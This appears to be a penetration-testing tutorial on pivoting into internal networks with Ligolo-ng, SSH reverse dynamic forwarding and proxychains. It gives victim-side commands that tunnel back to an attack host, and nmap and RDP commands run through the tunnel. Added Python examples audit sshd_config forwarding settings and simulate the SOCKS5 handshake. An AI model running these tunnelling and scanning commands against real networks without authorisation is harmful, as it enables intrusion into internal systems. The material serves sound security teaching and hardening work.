Pivoting (Proxying)
How to pivot into, and proxy tool traffic through, an internal network
Method 1: Ligolo-ng
Ligolo-ng is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels over a reverse connection, protected by TLS (elliptic-curve certificate).
1) On the victim host, run the agent and connect it back to your attack host (-ignore-cert skips verification of the self-signed certificate generated in the next step):
./ligolo.exe -connect <IP>:<PORT> -ignore-cert
2) On your attack host, run the proxy server:
Start the server with a self-signed certificate, listening on the port the agent connects to
sudo ./proxy -selfcert -laddr 0.0.0.0:<port>
Once the agent has connected, select the session and list the victim's network interfaces to see the internal ranges
session
ifconfig
Add a route to the victim's internal network (the range shown by ifconfig) via the ligolo TUN interface; the interface must already exist and be up
sudo ip route add <internal_network>/24 dev ligolo
Start the tunnel in the ligolo console
tunnel_start
Method 2: SSH Reverse Proxy
SSH can natively perform pivoting through its port forwarding. In the example below there are three machines:
The SSH server
The attack host
The victim host (in an internal network)
On your SSH server, generate an SSH key pair:
ssh-keygen -C attacker@attacker
Add the generated public key to your SSH server's authorized keys list:
/home/<user>/.ssh/authorized_keys
On your victim host, upload the generated private key and run the following command. -R with only a port creates a remote dynamic forward: the SSH server listens on port 1037 and the victim host acts as the SOCKS proxy behind it.
ssh -i <SSHKey> -R 1037 -N <user>@<SSH_IP_Address>
On your attack host, connect to the SSH server and forward a local port to that listener:
ssh -i <sshkey> -L 8008:localhost:1037 -vN <user>@<SSH_IP_Address>
You now have a path from your attack host, through the SSH server, to the victim host and its network.
Proxy any tool through the SOCKS proxy you created at 127.0.0.1:8008, either with the tool's own proxy option or with proxychains.
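The whole of Method 2 depends on the SSH server permitting TCP forwarding, which OpenSSH allows by default. The following added example (not from this page or from OpenSSH) audits an sshd_config for the keywords that govern -L/-R tunnels, and contrasts a constructed config that leaves the defaults in place with one that disables forwarding globally and re-enables only a narrow local forward for one user. It handles the "Keyword value" form and Match blocks; the two config texts are constructed samples.

```python
"""
Audit an sshd_config for the keywords that decide whether the -R/-L tunnels
above can be built through a server. Added example, not from the page or from
OpenSSH; the two config texts below are constructed samples.
"""

# OpenSSH defaults for the forwarding keywords, per sshd_config(5):
# forwarding is permitted unless the administrator turns it off.
DEFAULTS = {
    "allowtcpforwarding": "yes",   # yes | no | local | remote
    "permitopen": "any",           # destinations a local (-L/-D) forward may reach
    "permitlisten": "any",         # ports a remote (-R) forward may bind
    "gatewayports": "no",          # whether -R listeners bind beyond loopback
}


def parse_sshd_config(text):
    """Split an sshd_config into global settings and Match blocks.

    Returns (global_settings, [(match_criteria, settings), ...]). Keywords are
    lower-cased (sshd is case-insensitive) and only the first occurrence of a
    keyword in a scope is kept, which is how sshd resolves duplicates.
    Only the "Keyword value" form is handled, not "Keyword=value".
    """
    global_scope = {}
    blocks = []
    scope = global_scope
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            scope = {}
            blocks.append((value, scope))
            continue
        scope.setdefault(key, value)
    return global_scope, blocks


def audit_forwarding(text):
    """Return a list of findings describing which tunnels the config permits."""
    global_scope, blocks = parse_sshd_config(text)
    scopes = [("global", global_scope)] + [("Match " + c, s) for c, s in blocks]
    findings = []
    for label, settings in scopes:
        # Effective value: the block's own setting, else global, else default.
        eff = {k: settings.get(k, global_scope.get(k, d)).lower()
               for k, d in DEFAULTS.items()}
        fwd = eff["allowtcpforwarding"]
        if fwd in ("yes", "local", "remote"):
            findings.append(f"{label}: AllowTcpForwarding {fwd} "
                            "(ssh -L/-D/-R tunnels are allowed)")
        if fwd in ("yes", "local") and eff["permitopen"] == "any":
            findings.append(f"{label}: PermitOpen unrestricted "
                            "(local forwards may reach any host:port)")
        if fwd in ("yes", "remote") and eff["permitlisten"] == "any":
            findings.append(f"{label}: PermitListen unrestricted "
                            "(remote forwards may listen on any port)")
        if eff["gatewayports"] != "no":
            findings.append(f"{label}: GatewayPorts {eff['gatewayports']} "
                            "(remote-forwarded ports reachable from other hosts)")
    return findings


# Constructed sample 1: nothing about forwarding is set, so the defaults apply.
WEAK_CONFIG = """
Port 22
PasswordAuthentication no
"""

# Constructed sample 2: forwarding off globally, narrowly re-enabled for one user.
HARDENED_CONFIG = """
Port 22
PasswordAuthentication no
AllowTcpForwarding no
GatewayPorts no
Match User deploy
    AllowTcpForwarding local
    PermitOpen 10.0.0.5:5432
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"[{name}]")
        for finding in audit_forwarding(cfg) or ["no forwarding exposure found"]:
            print("  " + finding)
```

Against the weak sample the auditor reports that -L/-D/-R tunnels are allowed with no PermitOpen or PermitListen restriction; against the hardened sample the only remaining finding is the deliberately scoped local forward for the deploy user, whose PermitOpen pins it to a single host:port.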
Sending tools through a pivot (using Proxychains)
Proxychains forces every TCP connection made by a given application through one or more proxies, so tools without a proxy option of their own can still use the pivot.
1) Point proxychains at an established SOCKS pivot by editing /etc/proxychains.conf and adding a line under [ProxyList]:
nano /etc/proxychains.conf
socks4 127.0.0.1 9050
The host and port must match your actual SOCKS listener: 9050 is the proxychains default, so for the SSH example above use 127.0.0.1 8008 instead (the SSH dynamic forward speaks both SOCKS4 and SOCKS5).
2) Run tools through proxychains so their connections go to the local SOCKS port and onward through the SSH forward to the victim network:
proxychains nmap -v -Pn -sT 172.16.5.19
Only full TCP connect scans (-sT) work: a SOCKS proxy relays complete TCP connections that it opens itself, so SYN (half-open) scans, which need raw packets, cannot pass through it. -Pn is needed for the same reason, since ICMP host discovery does not traverse the proxy either.
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
proxychains <yourtool>
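To make concrete why only full TCP connections survive a SOCKS pivot, here is an added example (not from this page, nor from proxychains, ligolo-ng or OpenSSH) that encodes and decodes the SOCKS5 CONNECT exchange from RFC 1928 in memory: the client greeting, the server's method selection, the CONNECT request and the server's reply. The client only ever names a destination host and port; the proxy decides whether to open the TCP connection and then relays a byte stream, so there is no representation for an individual SYN. The simulated proxy also takes a permit callback to show where a destination policy (the equivalent of PermitOpen on an SSH server) is enforced. The destination 172.16.5.19:3389 and the permit rules are constructed sample values.

```python
"""
SOCKS5 (RFC 1928) CONNECT exchange, encoded and decoded in memory, playing
both the client and the proxy. Added example; addresses are constructed.
"""
import ipaddress
import struct

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
METHOD_NO_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCEEDED = 0x00
REP_NOT_ALLOWED = 0x02   # "connection not allowed by ruleset"


def build_greeting(methods=(METHOD_NO_AUTH,)):
    """Client -> proxy: VER, NMETHODS, METHODS."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def select_method(greeting, offered=(METHOD_NO_AUTH,)):
    """Proxy -> client: VER, METHOD (0xFF if nothing in common)."""
    if len(greeting) < 2 or greeting[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 greeting")
    nmethods = greeting[1]
    client_methods = greeting[2:2 + nmethods]
    if len(client_methods) != nmethods:
        raise ValueError("truncated greeting")
    for method in client_methods:
        if method in offered:
            return bytes([SOCKS_VERSION, method])
    return bytes([SOCKS_VERSION, METHOD_NO_ACCEPTABLE])


def build_connect(host, port):
    """Client -> proxy: VER, CMD, RSV, ATYP, DST.ADDR, DST.PORT."""
    try:
        ip = ipaddress.ip_address(host)
        addr = bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
    except ValueError:                      # not an IP literal: send a domain name
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("domain name too long for SOCKS5")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def _parse_addr(buf, offset):
    """Decode ATYP + address + port starting at offset; return (host, port, end)."""
    atyp = buf[offset]
    offset += 1
    if atyp == ATYP_IPV4:
        host, offset = str(ipaddress.IPv4Address(buf[offset:offset + 4])), offset + 4
    elif atyp == ATYP_IPV6:
        host, offset = str(ipaddress.IPv6Address(buf[offset:offset + 16])), offset + 16
    elif atyp == ATYP_DOMAIN:
        n = buf[offset]
        host, offset = buf[offset + 1:offset + 1 + n].decode("idna"), offset + 1 + n
    else:
        raise ValueError("unknown ATYP")
    (port,) = struct.unpack("!H", buf[offset:offset + 2])
    return host, port, offset + 2


def parse_connect(request):
    """Proxy side: return (cmd, host, port) from a client request."""
    if request[0] != SOCKS_VERSION or request[2] != 0x00:
        raise ValueError("malformed request")
    host, port, end = _parse_addr(request, 3)
    if end != len(request):
        raise ValueError("trailing bytes in request")
    return request[1], host, port


def build_reply(rep, bound_host="0.0.0.0", bound_port=0):
    """Proxy -> client: VER, REP, RSV, ATYP, BND.ADDR, BND.PORT."""
    ip = ipaddress.ip_address(bound_host)
    atyp = ATYP_IPV4 if ip.version == 4 else ATYP_IPV6
    return bytes([SOCKS_VERSION, rep, 0x00, atyp]) + ip.packed + struct.pack("!H", bound_port)


def parse_reply(reply):
    """Client side: return (rep, bound_host, bound_port)."""
    if reply[0] != SOCKS_VERSION or reply[2] != 0x00:
        raise ValueError("malformed reply")
    host, port, _ = _parse_addr(reply, 3)
    return reply[1], host, port


def simulate_connect(host, port, permit=lambda h, p: True):
    """Play both sides of a CONNECT and return the transcript plus the result.

    The proxy opens the TCP connection itself once it accepts the request; the
    client never sees or shapes packets, which is why half-open scans cannot
    cross a SOCKS pivot. `permit` stands in for the proxy's destination policy.
    """
    greeting = build_greeting()
    selection = select_method(greeting)
    if selection[1] == METHOD_NO_ACCEPTABLE:
        raise RuntimeError("no common authentication method")
    request = build_connect(host, port)
    cmd, dst_host, dst_port = parse_connect(request)
    rep = REP_SUCCEEDED if cmd == CMD_CONNECT and permit(dst_host, dst_port) else REP_NOT_ALLOWED
    reply = build_reply(rep)
    return {"greeting": greeting, "selection": selection, "request": request,
            "reply": reply, "status": parse_reply(reply)[0]}


if __name__ == "__main__":
    # Constructed destination: the RDP host from the proxychains example above.
    for step, data in simulate_connect("172.16.5.19", 3389).items():
        print(f"{step:>9}: {data.hex() if isinstance(data, bytes) else data}")
```

The request for 172.16.5.19:3389 encodes as 05 01 00 01 ac 10 05 13 0d 3d, and a proxy that refuses the destination answers with REP 0x02 before any connection is made; that refusal is the proxy's policy point, so restricting it (PermitOpen on sshd, or listener scope on a tunnelling tool) limits what a pivot can reach.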